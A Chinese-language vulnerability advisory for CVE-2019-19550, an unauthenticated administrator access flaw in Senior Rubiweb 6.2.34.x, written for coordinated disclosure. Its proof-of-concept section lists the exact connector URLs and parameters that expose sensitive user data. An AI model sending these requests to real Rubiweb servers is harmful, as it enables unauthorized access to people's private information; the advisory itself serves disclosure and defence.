CVE-2019-19550
[描述]
Senior Rubiweb 6.2.34.28 和 6.2.34.37 中的远程认证绕过漏洞允许管理员访问受影响用户的敏感信息。攻击者只需提供正确的URL即可。
[重要日期]
- 通知供应商日期:2019-12-02
- 公开披露日期:2020-01-30
[漏洞类型]
不正确的访问控制
[产品供应商]
Senior
[受影响产品代码库]
- Rubiweb - 6.2.34.37
- Rubiweb - 6.2.34.28
- 其他版本可能受影响,尤其是同一系列(尚未测试)
[受影响组件]
Rubiweb
[攻击类型]
远程
[影响信息披露]
True
[攻击向量]
敏感信息的访问无需特殊条件即可公开获取(仅需正确的URI)
[供应商是否确认或承认该漏洞?]
True
[PoC - 概念验证]
- 尝试连接已认证的门户以确认受影响产品的存在和版本:
- hXXp://subdomain.customer.tld:8080/rubiweb/
- 访问易受攻击的页面(无需认证的管理员):
- hXXp://subdomain.customer.tld:8080/rubiweb/conector?ACAO=EXESENHA&SIS=FP&LOGINKIND=1
- hXXp://subdomain.customer.tld:8080/rubiweb/conector?ACAO=ENTRANCEREL&SIS=FP&NOME=FPIN103.ANU
[发现者]
Mauricio Santos (R&D UnderProtection) 和 Hesron Hori (R&D UnderProtection)
[致谢]
Senior - 供应商信息安全团队,他们合作进行了协调披露
[参考]